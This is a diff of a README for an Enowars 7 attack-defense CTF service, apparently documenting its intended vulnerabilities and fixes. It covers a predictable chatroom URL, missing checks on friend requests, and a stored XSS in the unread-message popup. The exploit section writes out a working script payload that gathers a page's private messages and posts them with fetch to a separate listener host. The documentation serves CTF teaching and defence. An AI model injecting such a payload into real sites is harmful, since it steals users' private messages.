enowars/enowars7-service-asocialnetwork/documentation/README.md

     get http://localhost:3000/chatrooms/secret
 ### Intended Fixes
 1. Change URL generation to be independent of the chatroom name.
-2. Add check that the user sending the request is the same as the userName in the request body.
-And check that the user accepting the request is the same as the partner in the request body.
+2. Add check that the user sending the friend request is the same as the userName in the request body.
+Also check that the user accepting the friend request is the same as the partner in the request body of the friend request initiation.
 ## Cross-Site Scripting (XSS)

 - Category: XSS
 - Difficulty: Medium

-The new private message popup is vulnerable to XSS.
+The unread private message popup is vulnerable to XSS.
 The message is not sanitized and can be used to execute arbitrary JavaScript code.
 The checker uses a headless browser to retrieve the flag from the private messages, and will load through as many unread messages as possible.
 ### Exploit
     post http://localhost:3000/messages body: {"recipient":"foo", "message":"<script>function getText(){let text='';let messages = document.getElementsByClassName('message');for(let i = 0; i < messages.length; i++){text += messages[i].innerHTML;}return text; }fetch('http://localhost:6452/', {method: 'POST', body:'flag=' + getText(),headers: { 'Content-Type': 'application/x-www-form-urlencoded', },}); </script>"}